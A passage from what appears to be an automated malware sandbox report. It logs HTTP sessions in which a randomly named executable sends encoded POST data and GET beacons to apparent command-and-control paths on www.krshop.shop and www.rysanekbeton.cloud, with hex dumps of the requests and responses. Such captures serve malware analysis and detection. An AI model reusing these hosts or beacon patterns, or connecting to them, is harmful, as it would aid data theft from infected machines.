[TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html> <head> <title>STRATO - Domain reserved</title> </head> <body style="background-color: #fff; font-family: Open Sans, sans-serif; padding: 0; margin: 0;"> <div style="background-color: #f3f3f3; padding: 40px 0; width: 100%;"> <div style="width: 150px; margin-left: auto; margin-right: auto;"><a href="https://www.strato.de" rel="nofollow" style="border: 0;"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 157.4 33.7"><defs><style>.a{fill:#f80;}.b{fill:#f80;}</style></defs><title>STRATO</title><path class="a" d="M17.8,7a4.69,4.69,0,0,1-4.7-4.7H29.6A4.69,4.69,0,0,1,34.3,7V23.5a4.69,4.69,0,0,1-4.7-4.7V9.4A2.37,2.37,0,0,0,27.2,7Z" transform="translate(-1.3 -2.3)"/><path class="b" d="M57.7,32.9c-1.3,2.5-4.7,2.6-7.3,2.6-2.1,0-4-.1-5.2-.2-1.5-.1-1.8-.5-1.8-1.3V32.9c0-1.3.2-1.7,1.4-1.7,2.1,0,3.1.2,6.2.2,2.4,0,2.9-.2,2.9-2.3,0-2.4,0-2.5-1.3-3.1a42.2,42.2,0,0,0-4.5-1.8c-3.7-1.6-4.4-2.3-4.4-6.5,0-2.6.5-4.8,3.4-5.7a14,14,0,0,1,4.9-.6c1.6, [TRUNCATED]
                                                                                  Dec 9, 2024 06:59:27.583761930 CET1236INData Raw: 33 2c 30 2c 31 2e 36 2c 31 2e 33 2c 32 2e 31 2e 39 2e 35 2c 32 2c 2e 38 2c 32 2e 39 2c 31 2e 33 2c 34 2e 39 2c 32 2e 31 2c 36 2c 32 2e 35 2c 36 2c 36 2e 37 61 31 30 2e 31 32 2c 31 30 2e 31 32 2c 30 2c 30 2c 31 2d 2e 36 2c 34 2e 38 4d 37 37 2e 31
                                                                                  Data Ascii: 3,0,1.6,1.3,2.1.9.5,2,.8,2.9,1.3,4.9,2.1,6,2.5,6,6.7a10.12,10.12,0,0,1-.6,4.8M77.1,15.7c-2.1,0-3.7,0-5.2-.1v18a1.4,1.4,0,0,1-1.5,1.6H69c-1.1,0-1.7-.3-1.7-1.6V15.7c-1.5,0-3.2.1-5.3.1-1.5,0-1.5-.9-1.5-1.6v-.9A1.36,1.36,0,0,1,62,11.8H77.2c.8,0,1.
                                                                                  Dec 9, 2024 06:59:27.583775043 CET448INData Raw: 35 73 2d 2e 36 2c 37 2e 31 2d 32 2e 36 2c 39 2e 35 4d 31 35 33 2c 31 37 2e 34 63 2d 2e 38 2d 31 2e 36 2d 32 2e 34 2d 32 2e 33 2d 34 2e 34 2d 32 2e 33 73 2d 33 2e 36 2e 36 2d 34 2e 34 2c 32 2e 33 63 2d 2e 37 2c 31 2e 35 2d 2e 38 2c 34 2e 34 2d 2e
                                                                                  Data Ascii: 5s-.6,7.1-2.6,9.5M153,17.4c-.8-1.6-2.4-2.3-4.4-2.3s-3.6.6-4.4,2.3c-.7,1.5-.8,4.4-.8,6.1s.1,4.6.8,6.1,2.4,2.3,4.4,2.3,3.6-.7,4.4-2.3.8-4.2.8-6.1-.1-4.6-.8-6.1" transform="translate(-1.3 -2.3)"/><path class="a" d="M24.9,14a2.26,2.26,0,0,0-2.3-2.
                                                                                  Dec 9, 2024 06:59:27.583853006 CET1236INData Raw: 6f 6c 6f 72 3a 23 33 33 33 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 36 30 63 68 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b
                                                                                  Data Ascii: olor:#333;font-size: 18px; max-width: 60ch; margin-left: auto; margin-right: auto; padding: 60px 24px;"> <div style="padding-bottom: 30px" lang="en"><span style="font-size: 14px; color: #777; font-weight: bold;">English</s
                                                                                  Dec 9, 2024 06:59:27.583865881 CET527INData Raw: 2e 3c 2f 64 69 76 3e 0d 0a 20 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 22 20 6c 61 6e 67 3d 22 69 74 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34
                                                                                  Data Ascii: .</div> <div style="padding-bottom: 30px" lang="it"><span style="font-size: 14px; color: #777; font-weight: bold;">Italiano</span><br>Questo sito web &egrave; appena stato attivato. Ancora non c&#39;&egrave; contenuto.</div> </div>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  33192.168.2.75001013.248.169.48805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:59:33.156054020 CET823OUTPOST /5p01/ HTTP/1.1
                                                                                  Host: www.krshop.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.krshop.shop
                                                                                  Referer: http://www.krshop.shop/5p01/
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 74 43 53 7a 48 56 39 53 45 61 5a 74 63 4a 52 44 32 48 6f 6e 75 76 61 33 57 38 35 6a 67 69 4c 30 7a 4f 2b 50 53 37 30 4c 4a 4c 65 4f 31 32 63 41 73 34 57 67 67 49 6f 75 6c 36 4f 67 47 74 31 64 78 64 64 6f 43 58 61 47 49 45 33 70 5a 33 31 4f 37 69 33 66 6b 54 58 7a 4f 6c 52 49 62 57 62 71 4b 4b 6f 44 65 31 31 35 50 41 64 45 6c 62 4d 58 66 4c 51 61 59 38 39 77 79 6d 59 6f 2f 52 6a 33 71 6f 47 54 4f 6d 63 49 75 35 53 6f 42 57 5a 77 76 57 48 45 36 6a 57 35 55 73 42 39 34 34 64 7a 50 33 4e 64 44 53 55 48 66 38 75 36 73 74 65 48 67 46 39 6e 46 31 42 30 6b 6d 65 41 2f 55 46 4b 35 68 78 71 78 34 74 51 79 75 33 52 4e 78 75 33 75 41 3d 3d
                                                                                  Data Ascii: PHM8hj-=tCSzHV9SEaZtcJRD2Honuva3W85jgiL0zO+PS70LJLeO12cAs4WggIoul6OgGt1dxddoCXaGIE3pZ31O7i3fkTXzOlRIbWbqKKoDe115PAdElbMXfLQaY89wymYo/Rj3qoGTOmcIu5SoBWZwvWHE6jW5UsB944dzP3NdDSUHf8u6steHgF9nF1B0kmeA/UFK5hxqx4tQyu3RNxu3uA==
                                                                                  Dec 9, 2024 06:59:34.246535063 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                  content-length: 0
                                                                                  connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  34192.168.2.75001113.248.169.48805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:59:35.816483021 CET843OUTPOST /5p01/ HTTP/1.1
                                                                                  Host: www.krshop.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.krshop.shop
                                                                                  Referer: http://www.krshop.shop/5p01/
                                                                                  Content-Length: 240
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 74 43 53 7a 48 56 39 53 45 61 5a 74 64 74 74 44 30 6d 6f 6e 6f 50 61 32 49 73 35 6a 71 43 4c 77 7a 4f 69 50 53 35 5a 51 4a 2b 32 4f 31 53 4d 41 74 39 36 67 74 6f 6f 75 77 4b 4f 6c 62 64 31 6f 78 64 52 61 43 54 61 47 49 45 54 70 5a 31 39 4f 6e 44 33 63 6c 44 58 6d 61 56 52 4b 66 57 62 71 4b 4b 6f 44 65 30 52 54 50 45 35 45 6d 71 63 58 65 75 38 5a 45 4d 39 33 6b 32 59 6f 6f 42 6a 37 71 6f 48 70 4f 6c 5a 41 75 36 36 6f 42 54 6c 77 73 48 48 44 31 6a 57 37 65 4d 41 42 72 39 45 4b 4a 30 56 4f 4e 30 6b 6f 58 63 2b 53 67 37 66 6c 36 6e 78 4c 62 6b 35 50 67 6b 36 32 6f 79 59 2f 37 67 31 79 38 61 5a 78 74 5a 53 37 41 6a 50 7a 34 2b 67 4c 58 34 78 4b 31 45 6c 2f 49 4e 70 57 45 71 42 30 67 56 4d 3d
                                                                                  Data Ascii: PHM8hj-=tCSzHV9SEaZtdttD0monoPa2Is5jqCLwzOiPS5ZQJ+2O1SMAt96gtoouwKOlbd1oxdRaCTaGIETpZ19OnD3clDXmaVRKfWbqKKoDe0RTPE5EmqcXeu8ZEM93k2YooBj7qoHpOlZAu66oBTlwsHHD1jW7eMABr9EKJ0VON0koXc+Sg7fl6nxLbk5Pgk62oyY/7g1y8aZxtZS7AjPz4+gLX4xK1El/INpWEqB0gVM=
                                                                                  Dec 9, 2024 06:59:36.899353981 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                  content-length: 0
                                                                                  connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  35192.168.2.75001213.248.169.48805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:59:38.482201099 CET1856OUTPOST /5p01/ HTTP/1.1
                                                                                  Host: www.krshop.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.krshop.shop
                                                                                  Referer: http://www.krshop.shop/5p01/
                                                                                  Content-Length: 1252
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 74 43 53 7a 48 56 39 53 45 61 5a 74 64 74 74 44 30 6d 6f 6e 6f 50 61 32 49 73 35 6a 71 43 4c 77 7a 4f 69 50 53 35 5a 51 4a 34 75 4f 32 6c 6b 41 73 61 4f 67 73 6f 6f 75 73 61 4f 6b 62 64 31 31 78 64 35 65 43 54 66 6b 49 43 58 70 5a 58 46 4f 72 68 54 63 72 44 58 6d 59 56 52 48 62 57 61 79 4b 4b 34 48 65 30 42 54 50 45 35 45 6d 6f 30 58 64 37 51 5a 58 63 39 77 79 6d 59 53 2f 52 69 53 71 73 53 4c 4f 6d 31 51 75 72 61 6f 43 7a 56 77 74 31 2f 44 38 6a 57 6c 64 4d 41 5a 72 39 41 72 4a 33 78 38 4e 77 73 43 58 61 4f 53 6a 2f 79 68 2f 54 35 31 4b 33 70 45 69 58 4b 58 67 55 63 6f 35 41 77 45 78 4a 31 32 67 6f 47 48 50 7a 6e 42 78 37 56 77 42 62 70 35 77 48 78 45 46 64 38 47 62 4a 46 41 7a 67 6b 76 54 75 78 4a 41 4d 50 77 36 63 4e 59 4f 77 42 64 61 4a 53 63 64 77 6a 32 47 58 6b 5a 2f 48 67 76 34 43 7a 4d 35 52 48 2b 6a 53 51 42 51 6a 4c 69 68 66 35 49 6f 41 4a 67 64 34 54 71 74 48 61 37 44 39 53 4c 48 2f 52 41 70 55 66 49 62 4d 55 2b 48 4c 77 42 6f 67 52 61 76 6d 69 32 57 65 64 34 2b 69 [TRUNCATED]
                                                                                  Data Ascii: PHM8hj-=tCSzHV9SEaZtdttD0monoPa2Is5jqCLwzOiPS5ZQJ4uO2lkAsaOgsoousaOkbd11xd5eCTfkICXpZXFOrhTcrDXmYVRHbWayKK4He0BTPE5Emo0Xd7QZXc9wymYS/RiSqsSLOm1QuraoCzVwt1/D8jWldMAZr9ArJ3x8NwsCXaOSj/yh/T51K3pEiXKXgUco5AwExJ12goGHPznBx7VwBbp5wHxEFd8GbJFAzgkvTuxJAMPw6cNYOwBdaJScdwj2GXkZ/Hgv4CzM5RH+jSQBQjLihf5IoAJgd4TqtHa7D9SLH/RApUfIbMU+HLwBogRavmi2Wed4+iiJ5LsziE7uIaXsHJC3Owz2IoaGuuOdXp2mOZ15erEfyrgW5Zp+2XGexdxQedtCFp4LVPYHw+Qj8ZpOUXcr2kU4rn3CRzkem63LC8cvc/LQFgjsAPhz5ctPtwE+nDAudp1s+/kBBbk2K0g0RSA+HtWYmdYwUSec3AUkKdQFePbXoSjaMrTNWSu1cx3gqgcuAE9b0mmrFsjsiB+SmY7EtCdDN+ww0zYpcacY0wE5llyhRqBH8/dci6Z4sK/zy65wL40VcVgtvgCqQEEkkUw4qGT9CpbgY4Wk32bODXl0TdbwAwLWmoyX7ISl13EjLWeet7+NPU6FYPWC/t1+pz7IVNwE3pZ0mUuc2RDtGy/MJ1miul8aAPM7YEEySFMZorB+5qm2saJaLKxeYTOXXTM56S+gfZckdoCHdup65nJ+zOqB/7CeWEDMxUerADHOEEQROzQtpstNXXtqgC1+pZ3vdEuRbwU9sC13JWbdLQfPjgm7Y8Avue2OpHIhKqZLKp9E0++FUP6ZRxGLZvug/ph4Js0jB3Yg/OAAfZ8h8T+SfF97uTMTEhBP+1blsL+cu/ALk1IPYWVUJqq7ZwkgSIJdXoF38XWHt9TWIQbaIMw/L/wvddUaOVsBaEFTy9YNKyCQghnIbeA70x5IhZP7wy8aizezxBinCSr8y+jn [TRUNCATED]
                                                                                  Dec 9, 2024 06:59:39.563843012 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                  content-length: 0
                                                                                  connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  36192.168.2.75001313.248.169.48805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:59:41.140810966 CET558OUTGET /5p01/?PHM8hj-=gA6TElZrCKVvAudK23F9jNDYdfN6rlDKrsL6QppRHZfK3DYPsJvxm5gqg5Wra8oJ+dNxCku7PXatRX1MrBH30S65OjFWUkDmOoMpCFx3AEVSn7FxR5wufZcQu20w9g7Qi9GQUVJhypaN&tHfx=9byl HTTP/1.1
                                                                                  Host: www.krshop.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Dec 9, 2024 06:59:42.232922077 CET394INHTTP/1.1 200 OK
                                                                                  content-type: text/html
                                                                                  date: Mon, 09 Dec 2024 05:59:42 GMT
                                                                                  content-length: 273
                                                                                  connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 50 48 4d 38 68 6a 2d 3d 67 41 36 54 45 6c 5a 72 43 4b 56 76 41 75 64 4b 32 33 46 39 6a 4e 44 59 64 66 4e 36 72 6c 44 4b 72 73 4c 36 51 70 70 52 48 5a 66 4b 33 44 59 50 73 4a 76 78 6d 35 67 71 67 35 57 72 61 38 6f 4a 2b 64 4e 78 43 6b 75 37 50 58 61 74 52 58 31 4d 72 42 48 33 30 53 36 35 4f 6a 46 57 55 6b 44 6d 4f 6f 4d 70 43 46 78 33 41 45 56 53 6e 37 46 78 52 35 77 75 66 5a 63 51 75 32 30 77 39 67 37 51 69 39 47 51 55 56 4a 68 79 70 61 4e 26 74 48 66 78 3d 39 62 79 6c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?PHM8hj-=gA6TElZrCKVvAudK23F9jNDYdfN6rlDKrsL6QppRHZfK3DYPsJvxm5gqg5Wra8oJ+dNxCku7PXatRX1MrBH30S65OjFWUkDmOoMpCFx3AEVSn7FxR5wufZcQu20w9g7Qi9GQUVJhypaN&tHfx=9byl"}</script></head></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  37192.168.2.75001481.2.196.19805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:59:53.030214071 CET844OUTPOST /k6bb/ HTTP/1.1
                                                                                  Host: www.rysanekbeton.cloud
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.rysanekbeton.cloud
                                                                                  Referer: http://www.rysanekbeton.cloud/k6bb/
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 55 34 67 37 36 62 36 70 55 79 46 70 70 63 32 31 76 4b 55 71 36 35 63 48 38 52 53 4e 75 69 4f 4e 34 33 46 7a 55 4f 71 4c 2f 72 6a 2f 48 4e 33 61 65 50 73 73 6f 73 2f 75 74 6a 2f 78 34 33 36 51 57 71 4e 47 38 46 55 52 6e 39 6e 57 74 36 4f 79 57 43 54 44 37 36 38 55 56 61 41 55 7a 39 78 4d 43 6d 30 42 55 66 50 55 45 4d 4c 6e 6f 51 65 57 31 56 63 4b 32 6b 63 42 62 53 51 31 6f 58 73 45 77 43 6c 4d 64 6f 49 39 6f 69 52 53 4e 63 6b 55 55 32 53 4a 56 58 55 77 32 4c 4d 59 66 54 6e 74 47 6d 4a 61 53 5a 46 36 61 74 78 31 2f 32 56 74 56 39 54 36 7a 52 48 69 79 30 57 55 57 61 4f 73 34 31 65 50 68 2b 58 32 66 31 68 49 65 33 43 4a 62 77 3d 3d
                                                                                  Data Ascii: PHM8hj-=U4g76b6pUyFppc21vKUq65cH8RSNuiON43FzUOqL/rj/HN3aePssos/utj/x436QWqNG8FURn9nWt6OyWCTD768UVaAUz9xMCm0BUfPUEMLnoQeW1VcK2kcBbSQ1oXsEwClMdoI9oiRSNckUU2SJVXUw2LMYfTntGmJaSZF6atx1/2VtV9T6zRHiy0WUWaOs41ePh+X2f1hIe3CJbw==
                                                                                  Dec 9, 2024 06:59:54.311187983 CET355INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 09 Dec 2024 05:59:54 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  38192.168.2.75001581.2.196.19805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:59:55.692626953 CET864OUTPOST /k6bb/ HTTP/1.1
                                                                                  Host: www.rysanekbeton.cloud
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.rysanekbeton.cloud
                                                                                  Referer: http://www.rysanekbeton.cloud/k6bb/
                                                                                  Content-Length: 240
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 55 34 67 37 36 62 36 70 55 79 46 70 70 38 6d 31 6a 4e 41 71 37 5a 63 45 6c 68 53 4e 31 53 4f 42 34 33 5a 7a 55 4b 37 51 34 5a 58 2f 48 73 6e 61 59 2b 73 73 72 73 2f 75 31 7a 2b 37 37 48 37 53 57 72 77 37 38 45 6f 52 6e 35 33 57 74 2b 43 79 57 52 4c 41 36 71 38 61 59 36 41 73 72 64 78 4d 43 6d 30 42 55 66 62 75 45 4d 44 6e 6f 6a 57 57 30 77 67 46 6f 55 63 43 4e 43 51 31 36 6e 73 41 77 43 6c 2b 64 70 45 62 6f 6b 64 53 4e 59 30 55 55 6e 53 49 62 6e 55 32 79 4c 4e 68 58 77 4b 6f 49 30 68 6b 51 4a 4e 44 44 65 77 58 7a 67 55 50 50 66 66 57 74 41 2f 5a 32 32 79 69 42 38 54 5a 36 30 61 58 73 63 6a 58 41 43 45 69 54 6c 6a 4e 4e 41 57 38 78 6c 42 59 48 39 63 44 37 63 57 6a 36 74 6f 6f 64 34 4d 3d
                                                                                  Data Ascii: PHM8hj-=U4g76b6pUyFpp8m1jNAq7ZcElhSN1SOB43ZzUK7Q4ZX/HsnaY+ssrs/u1z+77H7SWrw78EoRn53Wt+CyWRLA6q8aY6AsrdxMCm0BUfbuEMDnojWW0wgFoUcCNCQ16nsAwCl+dpEbokdSNY0UUnSIbnU2yLNhXwKoI0hkQJNDDewXzgUPPffWtA/Z22yiB8TZ60aXscjXACEiTljNNAW8xlBYH9cD7cWj6tood4M=
                                                                                  Dec 9, 2024 06:59:56.969290972 CET355INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 09 Dec 2024 05:59:56 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  39192.168.2.75001681.2.196.19805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:59:58.352252960 CET1877OUTPOST /k6bb/ HTTP/1.1
                                                                                  Host: www.rysanekbeton.cloud
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.rysanekbeton.cloud
                                                                                  Referer: http://www.rysanekbeton.cloud/k6bb/
                                                                                  Content-Length: 1252
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 55 34 67 37 36 62 36 70 55 79 46 70 70 38 6d 31 6a 4e 41 71 37 5a 63 45 6c 68 53 4e 31 53 4f 42 34 33 5a 7a 55 4b 37 51 34 5a 50 2f 48 63 37 61 65 74 30 73 71 73 2f 75 72 6a 2b 36 37 48 36 4b 57 71 5a 77 38 45 6c 73 6e 37 2f 57 69 37 65 79 42 77 4c 41 31 71 38 61 45 4b 41 58 7a 39 77 49 43 6d 6b 46 55 66 4c 75 45 4d 44 6e 6f 6a 36 57 7a 6c 63 46 71 55 63 42 62 53 51 48 6f 58 73 6b 77 43 38 4a 64 70 51 74 6f 55 39 53 4d 35 59 55 57 52 6d 49 64 33 55 30 2f 72 4e 51 58 77 47 6a 49 30 39 43 51 4b 51 6d 44 63 67 58 78 31 4e 31 63 4f 2f 70 78 77 7a 54 32 33 66 46 4b 63 4f 75 37 46 71 66 78 63 6a 53 63 43 38 6a 51 55 79 48 4f 31 50 36 73 55 6c 59 66 76 77 7a 79 38 7a 32 69 2b 49 50 48 65 43 6a 68 48 6c 6e 44 67 54 54 70 31 41 4a 38 51 4b 50 4d 32 73 6b 67 4a 79 56 6b 73 45 49 61 79 6c 76 6e 50 70 6e 49 4d 59 56 73 38 50 42 56 72 6d 6c 4b 50 63 76 32 2b 43 52 55 38 57 55 4e 61 4f 6e 79 65 56 74 78 2f 75 34 52 41 38 76 54 47 70 77 4c 72 6b 34 58 76 70 4c 53 66 52 42 57 6c 6c 51 61 5a [TRUNCATED]
